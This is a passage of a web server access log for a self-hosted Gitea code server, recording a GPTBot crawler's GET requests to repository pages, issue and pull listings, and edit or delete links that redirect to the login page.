+https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&labels=0&milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:19:40:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp?display=rendered" [Client 74.7.227.38] [Length 11360] [Gzip 3.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" +[17/Feb/2026:19:40:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?milestone=-1&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10184] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?project=-1&sort=oldest&state=closed&type=all" +[17/Feb/2026:19:40:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/app_init.hpp?display=source" [Client 74.7.227.38] [Length 11636] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/app_init.hpp" +[17/Feb/2026:19:40:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977?files=C%2b%2bProject%2f.vscode%2fc_cpp_properties.json" [Client 74.7.227.38] [Length 18537] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/.vscode/c_cpp_properties.json" +[17/Feb/2026:19:40:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/python3?follow_symlink=1" [Client 74.7.227.38] [Length 11310] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin" +[17/Feb/2026:19:40:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/python3.12?display=source" [Client 74.7.227.38] [Length 11306] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/python3.12" +[17/Feb/2026:19:40:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?labels=0&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10204] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?labels=0&project=-1&state=closed&type=all" +[17/Feb/2026:19:40:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&milestone=-1&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10212] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:19:40:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/warn-GoldMonitor_V5.1.txt" [Client 74.7.227.38] [Length 14287] [Gzip 4.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1" +[17/Feb/2026:19:40:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/warn-GoldMonitor_V5.3.txt" [Client 74.7.227.38] [Length 14008] [Gzip 3.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3" +[17/Feb/2026:19:40:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/warn-GoldMonitor_V5.2.txt" [Client 74.7.227.38] [Length 14287] [Gzip 4.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2" +[17/Feb/2026:19:40:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10063] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:19:40:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&labels=0&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10192] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&labels=0&project=-1&state=open&type=all" +[17/Feb/2026:19:40:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&labels=0&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10053] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&labels=0&project=-1&state=closed&type=all" +[17/Feb/2026:19:40:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.dgspec.json?display=source" [Client 74.7.227.38] [Length 13040] [Gzip 4.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.dgspec.json" +[17/Feb/2026:19:40:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&labels=0&milestone=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10018] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&labels=0&milestone=-1&state=open&type=all" +[17/Feb/2026:19:40:11 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_new/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.AssemblyInfo.cs" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/blame/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.AssemblyInfo.cs" +[17/Feb/2026:19:40:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_new/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.AssemblyInfo.cs" +[17/Feb/2026:19:40:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&labels=0&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10222] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&labels=0&project=-1&state=open&type=all" +[17/Feb/2026:19:40:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10060] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&project=-1&state=open&type=all" +[17/Feb/2026:19:40:12 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldMonitor/build/GoldMonitor_V5.1/warn-GoldMonitor_V5.1.txt" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/warn-GoldMonitor_V5.1.txt" +[17/Feb/2026:19:40:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldMonitor/build/GoldMonitor_V5.1/warn-GoldMonitor_V5.1.txt" +[17/Feb/2026:19:40:13 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldMonitor/build/GoldMonitor_V5.3/warn-GoldMonitor_V5.3.txt" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/warn-GoldMonitor_V5.3.txt" +[17/Feb/2026:19:40:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldMonitor/build/GoldMonitor_V5.3/warn-GoldMonitor_V5.3.txt" +[17/Feb/2026:19:40:14 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldMonitor/build/GoldMonitor_V5.2/warn-GoldMonitor_V5.2.txt" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/warn-GoldMonitor_V5.2.txt" +[17/Feb/2026:19:40:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldMonitor/build/GoldMonitor_V5.2/warn-GoldMonitor_V5.2.txt" +[17/Feb/2026:19:40:14 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldMonitor/build/GoldMonitor_V5.1/warn-GoldMonitor_V5.1.txt" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/warn-GoldMonitor_V5.1.txt" +[17/Feb/2026:19:40:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldMonitor/build/GoldMonitor_V5.1/warn-GoldMonitor_V5.1.txt" +[17/Feb/2026:19:40:15 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldMonitor/build/GoldMonitor_V5.3/warn-GoldMonitor_V5.3.txt" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/warn-GoldMonitor_V5.3.txt" +[17/Feb/2026:19:40:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldMonitor/build/GoldMonitor_V5.3/warn-GoldMonitor_V5.3.txt" +[17/Feb/2026:19:40:15 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldMonitor/build/GoldMonitor_V5.2/warn-GoldMonitor_V5.2.txt" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/warn-GoldMonitor_V5.2.txt" +[17/Feb/2026:19:40:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldMonitor/build/GoldMonitor_V5.2/warn-GoldMonitor_V5.2.txt" +[17/Feb/2026:19:40:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldMonitor/build/GoldMonitor_V5.3/warn-GoldMonitor_V5.3.txt" [Client 74.7.227.38] [Length 9819] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/warn-GoldMonitor_V5.3.txt" +[17/Feb/2026:19:40:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldMonitor/build/GoldMonitor_V5.3/warn-GoldMonitor_V5.3.txt" [Client 74.7.227.38] [Length 930] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/warn-GoldMonitor_V5.3.txt" +[17/Feb/2026:19:40:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldMonitor/build/GoldMonitor_V5.1/warn-GoldMonitor_V5.1.txt" [Client 74.7.227.38] [Length 930] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/warn-GoldMonitor_V5.1.txt" +[17/Feb/2026:19:40:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/GoldMonitor/build/GoldMonitor_V5.1/warn-GoldMonitor_V5.1.txt" [Client 74.7.227.38] [Length 14133] [Gzip 6.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/warn-GoldMonitor_V5.1.txt" +[17/Feb/2026:19:40:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/GoldMonitor/build/GoldMonitor_V5.2/warn-GoldMonitor_V5.2.txt" [Client 74.7.227.38] [Length 14134] [Gzip 6.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/warn-GoldMonitor_V5.2.txt" +[17/Feb/2026:19:40:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldMonitor/build/GoldMonitor_V5.1/warn-GoldMonitor_V5.1.txt" [Client 74.7.227.38] [Length 9819] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/warn-GoldMonitor_V5.1.txt" +[17/Feb/2026:19:40:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldMonitor/build/GoldMonitor_V5.2/warn-GoldMonitor_V5.2.txt" [Client 74.7.227.38] [Length 9820] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/warn-GoldMonitor_V5.2.txt" +[17/Feb/2026:19:40:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldMonitor/build/GoldMonitor_V5.2/warn-GoldMonitor_V5.2.txt" [Client 74.7.227.38] [Length 930] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/warn-GoldMonitor_V5.2.txt" +[17/Feb/2026:19:40:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/GoldMonitor/build/GoldMonitor_V5.3/warn-GoldMonitor_V5.3.txt" [Client 74.7.227.38] [Length 13798] [Gzip 6.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/warn-GoldMonitor_V5.3.txt" +[17/Feb/2026:19:40:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10055] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&project=-1&state=open&type=all" +[17/Feb/2026:19:40:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10062] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&project=-1&state=closed&type=all" +[17/Feb/2026:19:40:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&labels=0&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10224] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&labels=0&project=-1&state=closed&type=all" +[17/Feb/2026:19:40:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10058] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&project=-1&state=closed&type=all" +[17/Feb/2026:19:40:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10059] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&project=-1&state=closed&type=all" +[17/Feb/2026:19:40:23 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/GoldMonitor/build/GoldMonitor_V5.1/warn-GoldMonitor_V5.1.txt" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldMonitor/build/GoldMonitor_V5.1/warn-GoldMonitor_V5.1.txt" +[17/Feb/2026:19:40:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/GoldMonitor/build/GoldMonitor_V5.1/warn-GoldMonitor_V5.1.txt" +[17/Feb/2026:19:40:24 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/GoldMonitor/build/GoldMonitor_V5.2/warn-GoldMonitor_V5.2.txt" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldMonitor/build/GoldMonitor_V5.2/warn-GoldMonitor_V5.2.txt" +[17/Feb/2026:19:40:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/GoldMonitor/build/GoldMonitor_V5.2/warn-GoldMonitor_V5.2.txt" +[17/Feb/2026:19:40:24 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/GoldMonitor/build/GoldMonitor_V5.2/warn-GoldMonitor_V5.2.txt" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldMonitor/build/GoldMonitor_V5.2/warn-GoldMonitor_V5.2.txt" +[17/Feb/2026:19:40:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/GoldMonitor/build/GoldMonitor_V5.2/warn-GoldMonitor_V5.2.txt" +[17/Feb/2026:19:40:25 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/GoldMonitor/build/GoldMonitor_V5.1/warn-GoldMonitor_V5.1.txt" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldMonitor/build/GoldMonitor_V5.1/warn-GoldMonitor_V5.1.txt" +[17/Feb/2026:19:40:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/GoldMonitor/build/GoldMonitor_V5.1/warn-GoldMonitor_V5.1.txt" +[17/Feb/2026:19:40:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?labels=0&milestone=-1&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10039] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&project=-1&sort=oldest&state=open&type=all" +[17/Feb/2026:19:40:26 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/GoldMonitor/build/GoldMonitor_V5.3/warn-GoldMonitor_V5.3.txt" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 